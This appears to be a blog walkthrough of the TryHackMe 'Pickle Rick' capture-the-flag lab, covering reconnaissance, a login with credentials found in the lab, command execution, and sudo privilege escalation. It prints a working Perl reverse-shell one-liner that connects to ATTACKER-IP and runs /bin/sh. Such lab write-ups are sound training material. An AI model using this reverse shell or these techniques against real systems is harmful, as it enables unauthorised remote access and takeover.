TryHackMe-Pickle Rick Walkthrough

INTRODUCTION

We begin with an Nmap scan and find port 22(ssh)and 80(http)open:

We see there is a webpage on port 80 and when we go to the source code (view-source) we find a usename: R1ckRul3s

We use Dirbuster to scan for directories and meanwhile run Nikto.We soon find a few directories such as /assets, /index.html, /login.php, /robots.txt

On visiting /robots.txt we find: Wubbalubbadubdub on the webpage.

Interesting…this can be the password, remember we had previously found a username R1ckRul3s. We now go to “login.php” and enter the credentials and we are finally in!

LOG IN AND YOU WILL GET THIS PAGE …

Looks like we can run commands here. After running “ls” we get ‘Sup3rS3cretPickl3Ingred.txt’

However we are unable to use “cat” command to read the file.If we try a few other commands, we see that the “less” command can be used instead of “cat”. BUT instead of banging our head in this webpage, trying to run commands, its better if we get a reverse shell on our terminal and look for all the files and directories. “PentestMonkey” is the go to place for finding reverse shells in different languages.

We try running netcat and getting a reverse connection in our terminal but it fails.However this Reverse Shell in Perl Language finally worked.Now an interesting thing to remember is that whenever you try getting reverse shell, it can fail but you should try in multiple languages not just one and trust me this often happens in CTFs

perl -e 'use Socket;$i="ATTACKER-IP";$p=LISTENING-PORT;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Make sure to paste your correct IP (of attacking machine) and port where your netcat is listening on and we Finally get a Reverse Shell !!!

We got our 1st flag, Notice Carefully that we have a txt file here called clue.txt.If we read it, it tells us “Look around the file system for the other ingredient.”

We can move to the home directory of rick where we find the 2nd flag

Now i tried looking around more directories and finally it seemed like the 3rd flag was in the root directory.Lets run the command “sudo -l” to see all the commands we can run as root.If you don’t know about sudo -l , this is the first command you MUST ALWAYS RUN in case you want to privilege escalate as this command shows you the commands you can run as root.

We see that we can run All ROOT commands without any password !!! (see the last line XD)

and we FINALLY found the 3rd flag in root directory! BINGO.I hope this walkthrough helped you learn something.Make sure to check out my other writeups on this platform.

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube